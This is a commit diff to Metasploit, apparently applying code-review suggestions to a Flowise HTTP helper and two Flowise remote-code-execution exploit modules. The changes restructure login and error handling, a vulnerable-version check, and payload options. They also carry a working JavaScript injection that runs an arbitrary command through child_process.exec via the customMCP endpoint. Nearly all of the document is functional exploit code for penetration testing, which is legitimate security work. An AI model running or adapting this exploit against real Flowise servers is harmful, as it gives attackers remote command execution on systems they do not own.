Apply review suggestions: use case/when, improve error handling, simplify code

Author: Chocapikk

lib/msf/core/exploit/remote/http/flowise.rb

@@ -63,14 +63,15 @@ def flowise_requires_auth?(version = nil)
           #
           # @param email [String] The email address for authentication
           # @param password [String] The password for authentication
-          # @return [Boolean] true if authentication succeeds, false otherwise
+          # @return [Boolean] true if authentication succeeds
+          # @raise [Msf::Exploit::Failed] if authentication fails or credentials are invalid
           #
           # @example
-          #   if flowise_login('admin@example.com', 'password')
-          #     print_good('Logged in successfully')
-          #   end
+          #   flowise_login('admin@example.com', 'password')
           def flowise_login(email, password)
-            return false if email.blank? || password.blank?
+            if email.blank? || password.blank?
+              fail_with(Msf::Exploit::Failure::BadConfig, 'Email and password are required for authentication')
+            end
 
             login_url = normalize_uri(target_uri.path, 'api', 'v1', 'auth', 'login')
             res = send_request_cgi({
@@ -88,16 +89,22 @@ def flowise_login(email, password)
               }.to_json
             })
 
-            return false unless res
+            unless res
+              fail_with(Msf::Exploit::Failure::TimeoutExpired, 'No response from server during login attempt')
+            end
 
-            if res.code == 200 || res.code == 201
+            case res.code
+            when 200, 201
               print_good('Authentication successful')
               return true
+            when 401
+              fail_with(Msf::Exploit::Failure::NoAccess, 'Authentication failed - invalid credentials')
+            when 404
+              # Flowise returns 404 with "User Not Found" when the user doesn't exist
+              fail_with(Msf::Exploit::Failure::NoAccess, 'Authentication failed - user not found')
+            else
+              fail_with(Msf::Exploit::Failure::UnexpectedReply, "Login failed with HTTP #{res.code}")
             end
-
-            fail_with(Msf::Exploit::Failure::NoAccess, 'Authentication failed - invalid credentials') if res.code == 401
-
-            fail_with(Msf::Exploit::Failure::UnexpectedReply, "Login failed with HTTP #{res.code}")
           end
 
           # Sends a request to the customMCP endpoint
@@ -142,28 +149,23 @@ def flowise_send_custommcp_request(payload_data, opts = {})
               return true
             end
 
-            if res.code == 200
+            case res.code
+            when 200
               vprint_status('Command sent successfully (HTTP 200)')
               return true
-            end
-
-            if res.code == 401
+            when 401
               vprint_error('Authentication required - check credentials')
               return false
-            end
-
-            if res.code == 404
+            when 404
               vprint_error('Endpoint not found - target may not be vulnerable')
               return false
-            end
-
-            if res.code == 500
+            when 500
               vprint_error('Server error - command may have failed to execute')
               return true
+            else
+              vprint_warning("Unexpected HTTP response code: #{res.code}")
+              return true
             end
-
-            vprint_warning("Unexpected HTTP response code: #{res.code}")
-            return true
           end
         end
       end

modules/exploits/multi/http/flowise_custommcp_rce.rb

@@ -83,7 +83,9 @@ def check
 
     # Vulnerability introduced in 2.2.7-patch.1 (March 14, 2025) and fixed in 3.0.1 (May 29, 2025)
     # Note: Rex::Version parses "2.2.7-patch.1" as "2.2.7.pre.patch.1", so we check >= 2.2.7
-      return CheckCode::Appears('(affected: >= 2.2.7-patch.1 and < 3.0.1)')  if (version >= Rex::Version.new('2.2.7') || version.to_s.include?('2.2.7')) && version < Rex::Version.new('3.0.1')
+    if (version >= Rex::Version.new('2.2.7') || version.to_s.include?('2.2.7')) && version < Rex::Version.new('3.0.1')
+      return CheckCode::Appears('(affected: >= 2.2.7-patch.1 and < 3.0.1)')
+    end
 
     CheckCode::Safe("Version #{version} is not vulnerable")
   end
@@ -107,11 +109,10 @@ def execute_command(cmd, _opts = {})
       'loadMethod' => 'listActions'
     }
 
-    opts = {}
-    if !datastore['FLOWISE_USERNAME'].blank? && !datastore['FLOWISE_PASSWORD'].blank?
-      opts[:username] = datastore['FLOWISE_USERNAME']
-      opts[:password] = datastore['FLOWISE_PASSWORD']
-    end
+    opts = {
+      username: datastore['FLOWISE_USERNAME'],
+      password: datastore['FLOWISE_PASSWORD']
+    }
 
     flowise_send_custommcp_request(payload_data, opts)
   end

modules/exploits/multi/http/flowise_js_rce.rb

@@ -37,6 +37,9 @@ def initialize(info = {})
         ],
         'Platform' => %w[unix linux win],
         'Arch' => [ARCH_CMD],
+        'Payload' => {
+          'BadChars' => "\x0d\x0a" # \r \n
+        },
         'Targets' => [
           [
             'Unix/Linux Command',
@@ -98,21 +101,26 @@ def check
 
   def execute_command(cmd, _opts = {})
     requires_auth = flowise_requires_auth?
+    email = datastore['FLOWISE_EMAIL']
+    password = datastore['FLOWISE_PASSWORD']
+    has_credentials = !email.blank? && !password.blank?
 
-    if requires_auth
-      if datastore['FLOWISE_EMAIL'].blank? || datastore['FLOWISE_PASSWORD'].blank?
-        fail_with(Failure::NoAccess, 'Authentication required - set FLOWISE_EMAIL and FLOWISE_PASSWORD')
-      end
-        fail_with(Failure::NoAccess, 'Authentication required for this version but login failed') unless flowise_login(datastore['FLOWISE_EMAIL'], datastore['FLOWISE_PASSWORD'])
-    elsif !datastore['FLOWISE_EMAIL'].blank? && !datastore['FLOWISE_PASSWORD'].blank?
-      flowise_login(datastore['FLOWISE_EMAIL'], datastore['FLOWISE_PASSWORD']) ||
-        vprint_warning('Login failed, but continuing without authentication (may work for versions < 3.0.1)')
+    if requires_auth && !has_credentials
+      fail_with(Failure::NoAccess, 'Authentication required - set FLOWISE_EMAIL and FLOWISE_PASSWORD')
     end
 
-    escaped_cmd = cmd.gsub('\\', '\\\\').gsub('"', '\\"').gsub("\n", '\\n').gsub("\r", '\\r')
+    if has_credentials
+      begin
+        flowise_login(email, password)
+      rescue Msf::Exploit::Failed
+        vprint_warning('Login failed, but continuing without authentication (may work for versions < 3.0.1)') unless requires_auth
+        raise if requires_auth
+      end
+    end
 
+    # BadChars ensures \r \n are not in the payload, but we still need to escape \ and " for JavaScript
     js_payload = '{x:(function(){const cp = process.mainModule.require("child_process");' \
-                 "cp.exec(\"#{escaped_cmd}\",()=>{});return 1;})()}"
+                 "cp.exec(\"#{cmd.gsub('\\', '\\\\').gsub('"', '\\"')}\",()=>{});return 1;})()}"
 
     payload_data = {
       'loadMethod' => 'listActions',
@@ -121,11 +129,10 @@ def execute_command(cmd, _opts = {})
       }
     }
 
-    opts = {}
-    if !datastore['FLOWISE_USERNAME'].blank? && !datastore['FLOWISE_PASSWORD'].blank?
-      opts[:username] = datastore['FLOWISE_USERNAME']
-      opts[:password] = datastore['FLOWISE_PASSWORD']
-    end
+    opts = {
+      username: datastore['FLOWISE_USERNAME'],
+      password: datastore['FLOWISE_PASSWORD']
+    }
 
     flowise_send_custommcp_request(payload_data, opts)
   end